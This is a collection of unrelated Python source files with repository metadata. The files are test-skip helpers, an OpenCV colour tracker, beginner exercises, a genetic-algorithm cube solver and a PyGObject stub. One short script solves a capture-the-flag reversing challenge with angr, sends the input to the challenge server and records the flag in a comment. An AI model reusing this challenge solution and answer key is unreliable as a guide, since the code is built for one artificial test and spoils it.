if testcaseid >= min and testcaseid <= max:
test_cls.skipTest('跳过执行被指定排除的TestCase')
def exclude_param_case(test_cls, exclude_param, common_params):
"""
exclude some testcase with some promparams
:param test_cls:
:param exclude_param: str
:param common_params: list
:return: list
"""
if exclude_param == '':
return
else:
exclude_params = exclude_param.split(',')
exclude_params = [param.strip() for param in exclude_params if param.strip() != '']
common = list(set(exclude_params) & set(common_params))
if common != []:
test_cls.skipTest('跳过执行该TestCase,包含需要被排除的参数: {}'.format(exclude_param))
# TODO 优化代码,提取only_test_caseids_tmp和only_test_caseids_range 公有部分
# TODO 将testcase中的该函数调用改为引用方式
def only_test_case(test_cls, testcaseid, only_test_caseids, desci=''):
"""
only test some cases in only_test_caseids list
:param test_cls:
:param testcaseid:
:param only_test_caseids: str
:return:
"""
if only_test_caseids.strip() == '':
return
skips_ = only_test_caseids.split(',')
only_test_caseids_tmp = []
only_test_caseids_range = []
for caseid in skips_:
if '-' in caseid:
ranges = caseid.split('-')
min = ranges[0].strip()
max = ranges[1].strip()
if min != '' and max != '':
if max < min:
min, max = max, min
only_test_caseids_range.append([min, max])
else:
only_test_caseids_tmp.append(caseid.strip())
if testcaseid not in only_test_caseids_tmp:
if only_test_caseids_range != []:
for i,ranges in enumerate(only_test_caseids_range):
min, max = ranges
if testcaseid >= min and testcaseid <= max:
break
else:
if i == len(only_test_caseids_range) -1:
test_cls._testMethodDoc = desci
test_cls.skipTest('没有在指定执行的TestCase列表中')
else:
test_cls._testMethodDoc = desci
test_cls.skipTest('没有在指定执行的TestCase列表中')
| [
"Sincave.Zhang@tech-trans.com"
] | Sincave.Zhang@tech-trans.com |
6c8ac1427f142513c13bd7794b07ab96a6f4c884 | 751cf52d62dba7d88387fc5734d6ee3954054fc2 | /opencv/experiments_raw/contourExperiments/contourExperiment.py | 25321959930231caf2a2607e82fe2c8687768cfe | [
"MIT"
] | permissive | nooralight/lab-computer-vision | 70a4d84a47a14dc8f5e9796ff6ccb59d4451ff27 | 0c3d89b35d0468d4d3cc5ce2653b3f0ac82652a9 | refs/heads/master | 2023-03-17T12:45:22.700237 | 2017-07-11T22:17:09 | 2017-07-11T22:17:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,364 | py | """
Display three views:
original frame
mask
resultant frame
whenever user clicks in original frame, color is specified
this color becomes the new mask color
The system then creates a contour around the largest object of that color on the screen, and a crosshair follows after that object
"""
import cv2
import numpy as np
color = np.array([0,0,0])
# CRAN = 20
# CRanArr = np.array([20, 10, 10])
# try (0, 50, 10)
def findHSV(bgr):
"convert BGR array to HSV"
bgr = np.uint8([[bgr]])
hsv = cv2.cvtColor(bgr, cv2.COLOR_BGR2HSV)
return hsv
def drawXHair(img, y, x):
# 20 pt radius
color = (0,0,255)
# color = tuple(col[0][0])
# print type(col)
# print(col)
radius = 20
thickn = 2
cv2.circle(img, (int(x), int(y)), 20, color, thickn)
cv2.line(img, (x-radius, y), (x+radius, y), color, thickn)
cv2.line(img, (x, y-radius), (x, y+radius), color, thickn)
def colorSelect(event, x, y, flags, param):
global color
if event == cv2.EVENT_LBUTTONUP:
color_rgb = frame[y, x, 0:3]
color = findHSV(color_rgb)
print(color)
def doNothing(x):
pass
cap = cv2.VideoCapture(0)
cv2.namedWindow('frame')
cv2.setMouseCallback('frame', colorSelect)
cv2.namedWindow('trackbars')
cv2.createTrackbar('H', 'trackbars', 0, 50, doNothing)
cv2.createTrackbar('S', 'trackbars', 50, 50, doNothing)
cv2.createTrackbar('V', 'trackbars', 10, 50, doNothing)
while(1):
dh = cv2.getTrackbarPos('H', 'trackbars')
ds = cv2.getTrackbarPos('S', 'trackbars')
dv = cv2.getTrackbarPos('V', 'trackbars')
CRanArr = np.array([dh, ds, dv])
# take each frame
_, frame = cap.read()
print(np.shape(frame))
# convert BGR to HSV
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
# define range of blue color in HSV
# lower_color = color + np.array([-CRAN, -CRAN, -CRAN])
# upper_color = color + np.array([CRAN, CRAN, CRAN])
lower_color = color - CRanArr
upper_color = color + CRanArr
# print lower_color , '|' , upper_color
# threshold the HSV image to get only blue colors
mask = cv2.inRange(hsv, lower_color, upper_color)
# Noise removal experimentation
kernel = np.ones((20,20), np.uint8)
mask = cv2.morphologyEx(mask, cv2.MORPH_CLOSE, kernel)
# mask = cv2.erode(mask, kernel, iterations = 1)
# mask = cv2.dilate(mask, kernel, iterations=5)
ret, thresh = cv2.threshold(mask, 127, 255, 0)
im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# cv2.drawContours(mask, contours, -1, 150, 3)
area = 0
largest_contour = 0
for i in xrange(len(contours)):
if cv2.contourArea(contours[i])>area:
largest_contour = i
cv2.drawContours(mask, contours, largest_contour, 150, 3)
print len(contours)
if len(contours)>0:
M = cv2.moments(contours[largest_contour])
if M['m00']>0:
cx = int(M['m10']/(M['m00']))
cy = int(M['m01']/(M['m00']))
print cx ,'|', cy
drawXHair(frame, cy, cx)
print(color)
# bitwise-AND mask and original image
res = cv2.bitwise_and(frame, frame, mask= mask)
cv2.imshow('frame', frame)
cv2.imshow('mask', mask)
cv2.imshow('res', res)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
cv2.destroyAllWindows()
| [
"danbudanov@gmail.com"
] | danbudanov@gmail.com |
4056ac1639854fe1a8734faa3016b7ccacbec880 | fb52ae5d98c4bcbba40c33fc0e23af1d532e7b8f | /Python/Python从入门到实践/基础知识/5if语句.py | 105b1c5fa639c38a14acb2b4dda4c5ddefbe92e8 | [] | no_license | zhengchaoxuan/Lesson-Code | 46426072d1b26191070fcc45c313f54c8db48cc5 | 872cd7074f5411ed5e7a23b99224fe0ed75a335a | refs/heads/master | 2021-03-14T04:43:01.299333 | 2020-08-21T07:12:47 | 2020-08-21T07:12:47 | 246,737,461 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,287 | py | # 该代码是python从入门到实践的练习源码
# date :2020/07/19
# version :0.1
# including:
# 1.关键字--in 和 not in
# 2.确定列表不为空
#5-3
alien_color = 'greens'
if alien_color =='green':
print('you win the 5 scores')
elif alien_color =='red':
print('you win the 10 scores')
else:
print('you win the 15 scores')
#5-7
alien_colors = ['green','red','greens']
if alien_color in alien_colors:
print('you win the 10 scores')
#5-8
admins = ['admin','wz','wqd','cxk','pyy']
if admins: #判断是否为空
if 'admin' in admins:
print('Hello admin would you like to see a status report?')
else:
print("hello,Eric,thank you for logging in again")
else:
print("we need to find some users")
#5-10
print('\n')
current_users = ['zcx','wz','wqd','cxk','pyy']
new_users = ['zcx','wmt','qyl','hxt','zbm']
for new_user in new_users:
if new_user.lower() in current_users:
print('please enter other name!')
else:
print('the name not be used!')
#5-11
print('\n')
lists = list(range(1,10))
for list1 in lists:
if list1 == 1:
print(str(list1)+'st')
elif list1 == 2:
print(str(list1)+'nd')
elif list1 == 3:
print(str(list1)+'rd')
else:
print(str(list1)+'th')
| [
"1139500799@qq.com"
] | 1139500799@qq.com |
d4c59887844231906cc69d067be102ec4d25bc76 | 6f0fe60f57dfb8c1055afc91d58f4975cf54ce26 | /Cuberoid.py | 60331bec69d6d20630e4edb83f5400c04bdf9e66 | [] | no_license | Developer-Achu/Cuberoid | ad7132e840402fafd61cd84cb38f99dfb6634db1 | 41195e1f781bbf0af6649bee2777f6e32e234844 | refs/heads/master | 2022-07-05T13:10:51.406119 | 2020-05-17T21:57:20 | 2020-05-17T21:57:20 | 238,088,693 | 0 | 0 | null | 2020-05-17T21:57:22 | 2020-02-04T00:11:32 | Python | UTF-8 | Python | false | false | 21,291 | py | import os
import pickle
import sys
import matplotlib.pyplot as plt
from Chromosome import *
from DefineStates import *
random.seed(CubeConstants.seed)
class Cuberoid:
def __init__(self, _configuration, _n, _chromosome_length, _population_size, _mutation_rate, _max_iterations,
_elite, _config_combination):
self.population = []
self.initial_population = []
self.mating_pool = []
self.updated_mating_pool = []
self.best = None
self.best_iteration = 0
self.iteration = 0
self.all_best_fitness = []
self.iteration_list = []
self.all_avg_fitness = []
self.each_best_fitness = []
self.side_0 = _configuration[0]
self.side_1 = _configuration[1]
self.side_2 = _configuration[2]
self.side_3 = _configuration[3]
self.side_4 = _configuration[4]
self.side_5 = _configuration[5]
self.n = _n
self.chromosome_length = _chromosome_length
self.population_size = _population_size
self.mutation_rate = _mutation_rate
self.max_iterations = _max_iterations
self.elite = _elite
self.config_combination = _config_combination
self.config_dict = {
1: (self.roulette_wheel, self.one_point_crossover, self.random_mutation),
2: (self.roulette_wheel, self.one_point_crossover, self.inversion_mutation),
3: (self.roulette_wheel, self.one_point_crossover, self.scramble_mutation),
4: (self.roulette_wheel, self.two_point_crossover, self.random_mutation),
5: (self.roulette_wheel, self.two_point_crossover, self.inversion_mutation),
6: (self.roulette_wheel, self.two_point_crossover, self.scramble_mutation),
7: (self.roulette_wheel, self.uniform_crossover, self.random_mutation),
8: (self.roulette_wheel, self.uniform_crossover, self.inversion_mutation),
9: (self.roulette_wheel, self.uniform_crossover, self.scramble_mutation),
10: (self.tournament, self.one_point_crossover, self.random_mutation),
11: (self.tournament, self.one_point_crossover, self.inversion_mutation),
12: (self.tournament, self.one_point_crossover, self.scramble_mutation),
13: (self.tournament, self.two_point_crossover, self.random_mutation),
14: (self.tournament, self.two_point_crossover, self.inversion_mutation),
15: (self.tournament, self.two_point_crossover, self.scramble_mutation),
16: (self.tournament, self.uniform_crossover, self.random_mutation),
17: (self.tournament, self.uniform_crossover, self.inversion_mutation),
18: (self.tournament, self.uniform_crossover, self.scramble_mutation),
19: (self.no_selection, self.one_point_crossover, self.random_mutation),
20: (self.no_selection, self.one_point_crossover, self.inversion_mutation),
21: (self.no_selection, self.one_point_crossover, self.scramble_mutation),
22: (self.no_selection, self.two_point_crossover, self.random_mutation),
23: (self.no_selection, self.two_point_crossover, self.inversion_mutation),
24: (self.no_selection, self.two_point_crossover, self.scramble_mutation),
25: (self.no_selection, self.uniform_crossover, self.random_mutation),
26: (self.no_selection, self.uniform_crossover, self.inversion_mutation),
27: (self.no_selection, self.uniform_crossover, self.scramble_mutation)
}
self.mating_pool_updation = self.config_dict[self.config_combination][0]
self.crossover = self.config_dict[self.config_combination][1]
self.mutation = self.config_dict[self.config_combination][2]
self.create_population()
def create_population(self):
for i in range(0, self.population_size):
chromosome = Chromosome(self.side_0, self.side_1, self.side_2, self.side_3, self.side_4, self.side_5,
self.chromosome_length, self.n)
chromosome.compute_fitness()
self.initial_population.append(chromosome)
def initialize_generation(self):
self.population = []
self.mating_pool = []
self.updated_mating_pool = []
self.best = None
self.best_iteration = 0
self.iteration = 0
for chromosome in self.initial_population:
chromosome_copy = chromosome.get_chromosome_copy()
self.update_best_child(chromosome_copy)
self.population.append(chromosome_copy)
def update_best_child(self, child):
if self.best is None or child.get_fitness() < self.best.get_fitness():
self.best = child.get_chromosome_copy()
self.best_iteration = self.iteration
self.all_best_fitness.append(self.best.get_fitness())
self.iteration_list.append(self.iteration)
sys.stdout.write(
"\r%s%d%s%d%s" % ("Iteration : ", self.iteration, " Cost: ", self.best.get_fitness(), "\n"))
sys.stdout.flush()
def random_selection(self):
parent_1 = self.mating_pool[random.randint(0, len(self.mating_pool) - 1)].get_chromosome_copy()
parent_2 = self.mating_pool[random.randint(0, len(self.mating_pool) - 1)].get_chromosome_copy()
return [parent_1, parent_2]
def one_point_crossover(self, parent_1, parent_2):
random_point = random.randint(0, self.chromosome_length - 1)
for i in range(random_point, self.chromosome_length):
parent_1.genes[i] = parent_2.genes[i]
return parent_1
def two_point_crossover(self, parent_1, parent_2):
random_indices = random.sample(range(self.chromosome_length), 2)
start_index = min(random_indices)
end_index = max(random_indices)
for i in range(start_index, end_index + 1):
parent_1.genes[i] = parent_2.genes[i]
return parent_1
def uniform_crossover(self, parent_1, parent_2):
for i in range(self.chromosome_length):
if random.random() < 0.5:
parent_1.genes[i] = parent_2.genes[i]
return parent_1
def random_mutation(self, child):
if random.random() < self.mutation_rate:
if random.random() < 0.5:
# random new gene
random_index = random.randint(0, self.chromosome_length - 1)
child.genes[random_index] = get_a_state_change()
else:
# flip a random bit on the gene
random_index = random.randint(0, self.chromosome_length - 1)
random_index_of_gene = random.randint(0, 5)
child.genes[random_index][random_index_of_gene] = (1 - child.genes[random_index][random_index_of_gene])
child.compute_fitness()
self.update_best_child(child)
def inversion_mutation(self, child):
if random.random() < self.mutation_rate:
random_indices = random.sample(range(self.chromosome_length), 2)
start_index = min(random_indices)
end_index = max(random_indices)
child.genes[start_index:end_index + 1] = child.genes[start_index:end_index + 1][::-1]
child.compute_fitness()
self.update_best_child(child)
def scramble_mutation(self, child):
if random.random() < self.mutation_rate:
random_indices = random.sample(range(self.chromosome_length), 2)
start_index = min(random_indices)
end_index = max(random_indices)
indices_list = list(range(start_index, end_index + 1))
random.shuffle(indices_list)
new_gene = []
for gene in child.genes:
ng = []
for pos in range(len(gene)):
ng.append(gene[pos])
new_gene.append(ng)
for index in range(start_index, end_index + 1):
new_gene[index] = child.genes[indices_list[index - start_index]]
child.set_genes(new_gene)
child.compute_fitness()
self.update_best_child(child)
def roulette_wheel(self):
self.mating_pool = []
for chromosome in self.population:
count = (((self.n ** 2) * 6) - chromosome.get_fitness())
for _ in range(count):
self.mating_pool.append(chromosome)
def tournament(self):
self.mating_pool = []
for i in range(self.population_size):
chromosome_1 = self.population[random.randint(0, self.population_size - 1)]
chromosome_2 = self.population[random.randint(0, self.population_size - 1)]
if chromosome_1.get_fitness() < chromosome_2.get_fitness():
self.mating_pool.append(chromosome_1)
else:
self.mating_pool.append(chromosome_2)
def no_selection(self):
self.mating_pool = self.population
def gen_replacement(self, new_population):
x = int(self.population_size * self.elite / 100)
best_x = []
worst_in_best = 0
worst_in_best_pos = 0
worst_x = []
best_in_worst = (self.n ** 2) * 6
best_in_worst_pos = 0
for i in range(x):
best_x.append(self.population[i])
if self.population[i].get_fitness() > worst_in_best:
worst_in_best = self.population[i].get_fitness()
worst_in_best_pos = i
worst_x.append(new_population[i])
if new_population[i].get_fitness() < best_in_worst:
best_in_worst = new_population[i].get_fitness()
best_in_worst_pos = i
for i in range(x, self.population_size):
if self.population[i].get_fitness() < worst_in_best:
best_x[worst_in_best_pos] = self.population[i]
worst_in_best = self.population[i].get_fitness()
for best_pos in range(0, x):
if best_x[best_pos].get_fitness() > worst_in_best:
worst_in_best = best_x[best_pos].get_fitness()
worst_in_best_pos = best_pos
if new_population[i].get_fitness() > best_in_worst:
worst_x[best_in_worst_pos] = new_population[i]
best_in_worst = new_population[i].get_fitness()
for worst_pos in range(0, x):
if worst_x[worst_pos].get_fitness() < best_in_worst:
best_in_worst = worst_x[worst_pos].get_fitness()
best_in_worst_pos = worst_pos
pos = 0
for i in range(self.population_size):
if new_population[i].get_fitness() >= best_in_worst:
new_population[i] = best_x[pos]
pos += 1
if pos == x:
break
self.population = new_population
def create_new_generation(self):
length = self.population_size
new_population = []
for _ in range(length):
parents = self.random_selection()
child = self.crossover(parents[0], parents[1])
self.mutation(child)
new_population.append(child)
self.gen_replacement(new_population)
def genetic_algorithm(self):
self.mating_pool_updation()
self.create_new_generation()
def find_average_fitness(self):
total = 0
for chromosome in self.population:
total += chromosome.get_fitness()
return total / len(self.population)
def solve(self):
self.iteration = 0
self.each_best_fitness = []
self.all_avg_fitness = []
while self.best.get_fitness() != 0 and self.iteration < self.max_iterations:
if self.iteration % 100 == 0:
sys.stdout.write("\r%s%d" % ("Iteration : ", self.iteration))
sys.stdout.flush()
self.genetic_algorithm()
self.each_best_fitness.append(self.best.get_fitness())
self.all_avg_fitness.append(self.find_average_fitness())
self.iteration += 1
# self.all_best_fitness.append(self.best.get_fitness())
print("\nPopulation size:", self.population_size)
print("Total iterations: ", self.iteration)
print("Best fitness: ", self.best.get_fitness())
# print("Average fitness of the final generation: ", self.find_average_fitness())
if self.best.get_fitness() == 0:
print("Best solution moves: ", print_moves(self.best.genes))
print("=======================================")
print("\n")
return self.best.get_fitness()
def write_to_file(fitness_across_initializations, config_combination, population_size, mutation_rate, iterations,
elite):
try:
os.mkdir(CubeConstants.directory_name)
except:
pass
data_dict = {}
data_dict.update({
"init": ["init-" + str(i) for i in range(len(fitness_across_initializations))]
})
for item in fitness_across_initializations:
for r in range(len(item)):
retries = []
for i in range(len(fitness_across_initializations)):
retries.append(fitness_across_initializations[i][r])
data_dict.update({
"r-" + str(r): retries
})
file_name = CubeConstants.directory_name + CubeConstants.file_name + str(population_size) + "-" + str(
mutation_rate) + "-" + str(iterations) + "-" + str(elite) + "-" + str(config_combination)
# file_name = CubeConstants.directory_name + CubeConstants.file_name + str(config_combination)
with open(file_name, 'w') as file:
for key in data_dict.keys():
file.write(key)
item = data_dict[key]
for element in item:
file.write(" " + str(element))
file.write("\n")
file.close()
def plot_graph(each_best_fitness, all_avg_fitness, current_path, initialization, retry):
plt.figure()
plt.plot(np.arange(0, len(all_avg_fitness)), all_avg_fitness, label="Average fitness")
plt.plot(np.arange(0, len(each_best_fitness)), each_best_fitness,
label="Best fitness = " + str(each_best_fitness[-1]))
plt.legend()
plt.savefig(current_path + "fig-i" + str(initialization) + "r" + str(retry))
plt.close()
# def write_evaluation_results(best_fitness_across_initializations, best_iteration_across_initializations,
# population_size, mutation_rate, iterations, elite):
# try:
# os.mkdir(CubeConstants.evaluation_directory_name)
# except:
# pass
#
# file_name = CubeConstants.evaluation_directory_name + CubeConstants.file_name + str(population_size) + "-" + str(
# mutation_rate) + "-" + str(iterations) + "-" + str(elite) + "-" + str(config_combination)
# with open(file_name, 'w') as file:
# for i in range(len(best_fitness_across_initializations)):
# file.write("i:" + str(i))
# file.write("\n")
# for j in range(len(best_fitness_across_initializations[i])):
# file.write(
# str(best_iteration_across_initializations[i][j]) + ":" + str(
# best_fitness_across_initializations[i][j]))
# file.write("\n")
# file.write("plot:" + str(i))
# file.write("\n")
# file.close()
n = 3
if len(sys.argv) == 9:
re_initializations = int(sys.argv[1])
retries = int(sys.argv[2])
chromosome_length = int(sys.argv[3])
population_size = int(sys.argv[4])
mutation_rate = float(sys.argv[5])
iterations = int(sys.argv[6])
elite = float(sys.argv[7])
config_combination = int(sys.argv[8])
else:
print("Invalid argument count")
exit(0)
# re_initializations = 1
# retries = 1
# chromosome_length = 5
# population_size = 10
# mutation_rate = 0.05
# iterations = 1
# elite = 0
# config_combination = 4
if config_combination == 1:
print("Roulette selection --> one-point crossover --> random mutation")
elif config_combination == 2:
print("Roulette selection --> one-point crossover --> inversion mutation")
elif config_combination == 3:
print("Roulette selection --> one-point crossover --> scramble mutation")
elif config_combination == 4:
print("Roulette selection --> two-point crossover --> random mutation")
elif config_combination == 5:
print("Roulette selection --> two-point crossover --> inversion mutation")
elif config_combination == 6:
print("Roulette selection --> two-point crossover --> scramble mutation")
elif config_combination == 7:
print("Roulette selection --> uniform crossover --> random mutation")
elif config_combination == 8:
print("Roulette selection --> uniform crossover --> inversion mutation")
elif config_combination == 9:
print("Roulette selection --> uniform crossover --> scramble mutation")
elif config_combination == 10:
print("Tournament selection --> one-point crossover --> random mutation")
elif config_combination == 11:
print("Tournament selection --> one-point crossover --> inversion mutation")
elif config_combination == 12:
print("Tournament selection --> one-point crossover --> scramble mutation")
elif config_combination == 13:
print("Tournament selection --> two-point crossover --> random mutation")
elif config_combination == 14:
print("Tournament selection --> two-point crossover --> inversion mutation")
elif config_combination == 15:
print("Tournament selection --> two-point crossover --> scramble mutation")
elif config_combination == 16:
print("Tournament selection --> uniform crossover --> random mutation")
elif config_combination == 17:
print("Tournament selection --> uniform crossover --> inversion mutation")
elif config_combination == 18:
print("Tournament selection --> uniform crossover --> scramble mutation")
elif config_combination == 19:
print("No selection --> one point crossover --> random mutation")
elif config_combination == 20:
print("No selection --> one-point crossover --> inversion mutation")
elif config_combination == 21:
print("No selection --> one-point crossover --> scramble mutation")
elif config_combination == 22:
print("No selection --> two-point crossover --> random mutation")
elif config_combination == 23:
print("No selection --> two-point crossover --> inversion mutation")
elif config_combination == 24:
print("No selection --> two-point crossover --> scramble mutation")
elif config_combination == 25:
print("No selection --> uniform crossover --> random mutation")
elif config_combination == 26:
print("No selection --> uniform crossover --> inversion mutation")
elif config_combination == 27:
print("No selection --> uniform crossover --> scramble mutation")
file_name = str(n) + "x" + str(n)
file = open(file_name, "rb")
list_of_configurations = pickle.load(file)
try:
os.mkdir(CubeConstants.evaluation_directory_name)
except:
pass
for index, configuration in enumerate(list_of_configurations):
current_path = CubeConstants.evaluation_directory_name + "Orientation-" + str(index + 1) + "/"
try:
os.mkdir(current_path)
except:
pass
best_fitness_across_initializations = []
best_iteration_across_initializations = []
best_fitness = 0
seed_value = CubeConstants.seed
print("Cube orientation: " + str(index + 1))
for initialization in range(re_initializations):
CubeConstants.seed = seed_value
print("initialization: " + str(initialization))
print("chromosome length: " + str(chromosome_length))
cuberoid = Cuberoid(
configuration,
n,
chromosome_length,
population_size,
mutation_rate,
iterations,
elite,
config_combination
)
best_fitness_across_retries = []
for retry in range(retries):
CubeConstants.seed = seed_value + (retry * 1000)
random.seed(CubeConstants.seed)
print("seed value: " + str(CubeConstants.seed))
print("retry: " + str(retry))
print("\n")
cuberoid.initialize_generation()
best_fitness = cuberoid.solve()
# best_fitness_across_retries.append(best_fitness)
plot_graph(cuberoid.each_best_fitness, cuberoid.all_avg_fitness, current_path, initialization, retry)
if best_fitness == 0:
# pass
break
# best_fitness_across_initializations.append(best_fitness_across_retries)
# best_fitness_across_initializations.append(cuberoid.all_best_fitness)
# best_iteration_across_initializations.append(cuberoid.iteration_list)
if best_fitness == 0:
# pass
break
# write_evaluation_results(best_fitness_across_initializations, best_iteration_across_initializations,
# population_size, mutation_rate, iterations, elite)
# write_to_file(best_fitness_across_initializations, config_combination, population_size, mutation_rate, iterations,
# elite)
| [
"achuunnikrishnan1@gmail.com"
] | achuunnikrishnan1@gmail.com |
ce5f5ad35cd9724f793635facd78f30c9089db02 | 93f3cbe9e3b5ec732cd9cbb4e144f74d45a439ad | /rev3/solve.py | 5ffb1af272998091cd74fb759168200b46263bd8 | [] | no_license | bennofs/cscg20 | 574256a17036f3c08a3cacca47f216466623ac88 | 8f1377ee5003cbf75fe4675a4cc43ccc8b0254e7 | refs/heads/master | 2022-09-11T03:15:45.298241 | 2020-05-31T18:15:53 | 2020-05-31T23:36:59 | 248,774,365 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | #!/usr/bin/env python3
import angr
import socket
p = angr.Project("./rev3")
sm = p.factory.simulation_manager(p.factory.entry_state())
sm.explore(find=lambda s: b"right" in s.posix.dumps(1))
s = socket.socket()
s.connect(("hax1.allesctf.net", 9602))
print(s.recv(100))
s.send(sm.one_found.posix.dumps(0))
print(s.recv(100))
print(s.recv(100))
# CSCG{pass_1_g3ts_a_x0r_p4ss_2_g3ts_a_x0r_EVERYBODY_GETS_A_X0R}
| [
"benno.fuenfstueck@gmail.com"
] | benno.fuenfstueck@gmail.com |
d75b698c226ed15a03af9baa81e247e3850aada7 | 92e0cb619b50b465082adc7058447c377447f7ce | /Test code12.py | c4befcceb5f3ccf0907b3be2ae01f5133bf7ea42 | [] | no_license | KeDixMCA/Test | f991bfc72490e4dfc644351a3bf800929bbd2a27 | ff7f7992b2553b6d0d488de775cd7fd2e3ef091e | refs/heads/master | 2023-01-30T13:44:24.640412 | 2020-12-16T05:28:47 | 2020-12-16T05:28:47 | 316,904,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | x = 1 / 2 + 3 // 3 + 4 ** 2
print(x) | [
"61177206+KeDixMCA@users.noreply.github.com"
] | 61177206+KeDixMCA@users.noreply.github.com |
76c88c378f30434c23ff53230551d62966e81f4c | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Dazzle/SettingsSandwich.py | 4bf884a1566ec11046ea8ac3aff429377d644bff | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 18,357 | py | # encoding: utf-8
# module gi.repository.Dazzle
# from /usr/lib64/girepository-1.0/Dazzle-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.Gio as __gi_overrides_Gio
import gi.overrides.GObject as __gi_overrides_GObject
import gi.overrides.Gtk as __gi_overrides_Gtk
import gi.repository.Gio as __gi_repository_Gio
import gi.repository.GObject as __gi_repository_GObject
import gi.repository.Gtk as __gi_repository_Gtk
import gobject as __gobject
class SettingsSandwich(__gi_overrides_GObject.Object):
"""
:Constructors:
::
SettingsSandwich(**properties)
new(schema_id:str, path:str) -> Dazzle.SettingsSandwich
"""
def append(self, settings): # real signature unknown; restored from __doc__
""" append(self, settings:Gio.Settings) """
pass
def bind(self, key, p_object=None, property, flags): # real signature unknown; restored from __doc__
""" bind(self, key:str, object=None, property:str, flags:Gio.SettingsBindFlags) """
pass
def bind_property(self, *args, **kwargs): # real signature unknown
pass
def bind_property_full(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def bind_with_mapping(self, key, p_object=None, property, flags, get_mapping, set_mapping, user_data=None): # real signature unknown; restored from __doc__
""" bind_with_mapping(self, key:str, object=None, property:str, flags:Gio.SettingsBindFlags, get_mapping:Gio.SettingsBindGetMapping, set_mapping:Gio.SettingsBindSetMapping, user_data=None) """
pass
def chain(self, *args, **kwargs): # real signature unknown
pass
def compat_control(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def connect(self, *args, **kwargs): # real signature unknown
pass
def connect_after(self, *args, **kwargs): # real signature unknown
pass
def connect_data(self, detailed_signal, handler, *data, **kwargs): # reliably restored by inspect
"""
Connect a callback to the given signal with optional user data.
:param str detailed_signal:
A detailed signal to connect to.
:param callable handler:
Callback handler to connect to the signal.
:param *data:
Variable data which is passed through to the signal handler.
:param GObject.ConnectFlags connect_flags:
Flags used for connection options.
:returns:
A signal id which can be used with disconnect.
"""
pass
def connect_object(self, *args, **kwargs): # real signature unknown
pass
def connect_object_after(self, *args, **kwargs): # real signature unknown
pass
def disconnect(*args, **kwargs): # reliably restored by inspect
""" signal_handler_disconnect(instance:GObject.Object, handler_id:int) """
pass
def disconnect_by_func(self, *args, **kwargs): # real signature unknown
pass
def emit(self, *args, **kwargs): # real signature unknown
pass
def emit_stop_by_name(self, detailed_signal): # reliably restored by inspect
""" Deprecated, please use stop_emission_by_name. """
pass
def find_property(self, property_name): # real signature unknown; restored from __doc__
""" find_property(self, property_name:str) -> GObject.ParamSpec """
pass
def force_floating(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def freeze_notify(self): # reliably restored by inspect
"""
Freezes the object's property-changed notification queue.
:returns:
A context manager which optionally can be used to
automatically thaw notifications.
This will freeze the object so that "notify" signals are blocked until
the thaw_notify() method is called.
.. code-block:: python
with obj.freeze_notify():
pass
"""
pass
def getv(self, names, values): # real signature unknown; restored from __doc__
""" getv(self, names:list, values:list) """
pass
def get_boolean(self, key): # real signature unknown; restored from __doc__
""" get_boolean(self, key:str) -> bool """
return False
def get_data(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def get_default_value(self, key): # real signature unknown; restored from __doc__
""" get_default_value(self, key:str) -> GLib.Variant """
pass
def get_double(self, key): # real signature unknown; restored from __doc__
""" get_double(self, key:str) -> float """
return 0.0
def get_int(self, key): # real signature unknown; restored from __doc__
""" get_int(self, key:str) -> int """
return 0
def get_properties(self, *args, **kwargs): # real signature unknown
pass
def get_property(self, *args, **kwargs): # real signature unknown
pass
def get_qdata(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def get_string(self, key): # real signature unknown; restored from __doc__
""" get_string(self, key:str) -> str """
return ""
def get_uint(self, key): # real signature unknown; restored from __doc__
""" get_uint(self, key:str) -> int """
return 0
def get_user_value(self, key): # real signature unknown; restored from __doc__
""" get_user_value(self, key:str) -> GLib.Variant """
pass
def get_value(self, key): # real signature unknown; restored from __doc__
""" get_value(self, key:str) -> GLib.Variant """
pass
def handler_block(obj, handler_id): # reliably restored by inspect
"""
Blocks the signal handler from being invoked until
handler_unblock() is called.
:param GObject.Object obj:
Object instance to block handlers for.
:param int handler_id:
Id of signal to block.
:returns:
A context manager which optionally can be used to
automatically unblock the handler:
.. code-block:: python
with GObject.signal_handler_block(obj, id):
pass
"""
pass
def handler_block_by_func(self, *args, **kwargs): # real signature unknown
pass
def handler_disconnect(*args, **kwargs): # reliably restored by inspect
""" signal_handler_disconnect(instance:GObject.Object, handler_id:int) """
pass
def handler_is_connected(*args, **kwargs): # reliably restored by inspect
""" signal_handler_is_connected(instance:GObject.Object, handler_id:int) -> bool """
pass
def handler_unblock(*args, **kwargs): # reliably restored by inspect
""" signal_handler_unblock(instance:GObject.Object, handler_id:int) """
pass
def handler_unblock_by_func(self, *args, **kwargs): # real signature unknown
pass
def install_properties(self, pspecs): # real signature unknown; restored from __doc__
""" install_properties(self, pspecs:list) """
pass
def install_property(self, property_id, pspec): # real signature unknown; restored from __doc__
""" install_property(self, property_id:int, pspec:GObject.ParamSpec) """
pass
def interface_find_property(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def interface_install_property(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
def interface_list_properties(self, *args, **kargs): # reliably restored by inspect
# no doc
pass
